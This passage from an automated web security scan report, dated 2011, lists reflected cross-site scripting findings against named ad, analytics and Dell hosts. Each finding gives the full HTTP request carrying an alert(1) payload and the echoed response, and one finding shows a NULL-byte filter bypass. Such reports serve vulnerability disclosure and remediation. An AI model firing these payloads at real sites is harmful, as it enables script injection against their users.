GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:19 GMT
Vary: Accept-Encoding
Content-Length: 2788
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189880" target="_blank">
...[SNIP]...

3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03eb"><script>alert(1)</script>7e59f800e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d139849e803ea11194558dfe7e; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:27 GMT
Vary: Accept-Encoding
Content-Length: 2797
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189887" target="_blank">
...[SNIP]...

3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3597"><script>alert(1)</script>b03c2c220a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=76d1c1c13ab3ee7a7ea9fbf0927e; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:29 GMT
Vary: Accept-Encoding
Content-Length: 2797
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90">
...[SNIP]...

3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d07'-alert(1)-'6c52c7876e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve/v=5;m=3;l=19240;c=161441;b=975458;ts=20110904223053;pasmc=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3vUzWzRkTubuDYukjQSIn8ytAZ-Y7JoC56mo3jLrwu3UHAAQARgBIAA4AVCAx-HEBGDJ1vqGyKOgGYIBF2NhLXB1Yi0zNDQwODAwMDc2Nzk3OTQ5oAG3oMjrA7IBEXd3dy53M3NjaG9vbHMuY29tugEJNzI4eDkwX2FzyAEJ2gE5aHR0cDovL3d3dy53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&a8d07'-alert(1)-'6c52c7876e6=1 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3440800076797949&output=html&h=90&slotname=5330033957&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.w3schools.com%2Fjs%2Ftryit.asp%3Ffilename%3Dtryjs_text&dt=1315189888080&bpp=10&shv=r20110824&jsv=r20110719&correlator=1315189888119&frm=7&adk=716720423&ga_vid=1478965365.1315189423&ga_sid=1315189423&ga_hid=817954302&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=verdana&dfs=12&biw=1266&bih=910&ifk=790186330&fu=4&ifi=3&dtd=51
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK; JSESSIONID=76c8b6bd9362121274a3e06817e9

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 05 Sep 2011 02:31:32 GMT
Vary: Accept-Encoding
Content-Length: 2872
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&a8d07'-alert(1)-'6c52c7876e6=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189893" target="_blank">
...[SNIP]...

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 76146<script>alert(1)</script>7493ba11a6a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData76146<script>alert(1)</script>7493ba11a6a&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2100_NewsReel.html?baseDocId=SB10001424053111904900904576549933849920392
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Sun, 04 Sep 2011 16:17:53 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 219
Connection: keep-alive

dj.module.ad.bio.loadBizoData76146<script>alert(1)</script>7493ba11a6a({"bizographics":{"industry":[{"code":"business_services","name":"Business Services"}],"location":{"code":"texas","name":"USA - Texas"}},"usage":1});

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload a61d8<script>alert(1)</script>7791fa49f3c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvuna61d8<script>alert(1)</script>7791fa49f3c HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/0_0_WP_2100_NewsReel.html?baseDocId=SB10001424053111904900904576549933849920392
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:17:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=5385daf0-5a45-4c91-b8da-57deda1620a8;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvuna61d8<script>alert(1)</script>7791fa49f3c)

3.12. http://apps.sapha.com/appshandler.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %001ed17<script>alert(1)</script>4582190b2ea was submitted in the ac parameter. This input was echoed as 1ed17<script>alert(1)</script>4582190b2ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /appshandler.php?ac=2522%001ed17<script>alert(1)</script>4582190b2ea&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2522=TRUE; sapha_2522_1=1038376%7C214589%7C149788%7C2011-09-04+10%3A18%3A45

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 603
Connection: close
Content-Type: text/html;charset=UTF-8

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2522.1ed17<script>alert(1)</script>4582190b2ea AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br>
...[SNIP]...

3.13. http://content-cdn.dell.com/JS/default/jsStrings.ashx [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /JS/default/jsStrings.ashx

Issue detail

The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3dca'%3balert(1)//c47aa975679 was submitted in the st parameter. This input was echoed as a3dca';alert(1)//c47aa975679 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /JS/default/jsStrings.ashx?c=us&l=en&s=bsd&cs=04&st=thundera-ui-jsa3dca'%3balert(1)//c47aa975679 HTTP/1.1
Host: content-cdn.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Vary: Accept-Encoding
Content-Length: 251
Date: Sun, 04 Sep 2011 16:19:18 GMT
Connection: close
Cache-Control: public, max-age=21600


var DELL = window.DELL || {};
DELL.com = DELL.com || {};
DELL.com.Resources = DELL.com.Resources||{};
var sary=DELL.com.Resources['thundera-ui-jsa3dca';alert(1)//c47aa975679']=[];
for(var i=0;i<sary.length;i++){sary[sary[i].Key]=sary[i].Value}

3.14. http://dce.sapha.com/engine.php [ac parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The value of the ac request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abad5"%3b1a7a9ffcd44 was submitted in the ac parameter. This input was echoed as abad5";1a7a9ffcd44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /engine.php?ac=2522abad5"%3b1a7a9ffcd44 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding,User-Agent
Content-Length: 5637
Connection: close
Content-Type: application/x-javascript

var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('cymphonix.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','gif','jpg','tar','
...[SNIP]...
,NS_ev=0,NS_la="",NS_js="Undetermined",NS_pn=(NS_pn)?escape(NS_pn):"",NS_vpn=(NS_vpn)?escape(NS_vpn):"",NS_uuid=(NS_uuid)?escape(NS_uuid):"",NS_pt=(document.title)?escape(document.title):"",NS_ac="2522abad5";1a7a9ffcd44",NS_c=(NS_c)?NS_c:"yes",NS_rn=Math.round(Math.random()*(99999-1))+1,NS_ru=document.referrer,NS_vp=(typeof (document.location)!="undefined")?document.location:"",NS_dobj=new Date(),NS_sw=(screen.width)
...[SNIP]...

3.15. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 24b83<script>alert(1)</script>22cc2cf8cfc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153156805-386656&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=3&mbox=MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc&mboxId=0&mboxTime=1315135156805&clicked=undefined&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1315153150925-582363; mboxPC=1315153150925-582363.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/JavaScript
Content-Length: 308
Date: Sun, 04 Sep 2011 16:20:22 GMT
Server: Test & Target

mboxFactories.get('default').get('MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc',0).cancelTimeout();mboxFactories.get('default').get('MboxTrack24b83<script>alert(1)</script>22cc2cf8cfc',0).setOff
...[SNIP]...

3.16. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax [profile.catid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The value of the profile.catid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb52'%3balert(1)//dfc1fb26081 was submitted in the profile.catid parameter. This input was echoed as 2eb52';alert(1)//dfc1fb26081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153155747-78365&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=1&mbox=enus_ng&mboxId=0&mboxTime=1315135150946&profile.r=us&profile.c=us&profile.l=en&profile.s=bsd&profile.cs=04&profile.pn=&profile.pt=&profile.catid=2eb52'%3balert(1)//dfc1fb26081&profile.catpath=&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplica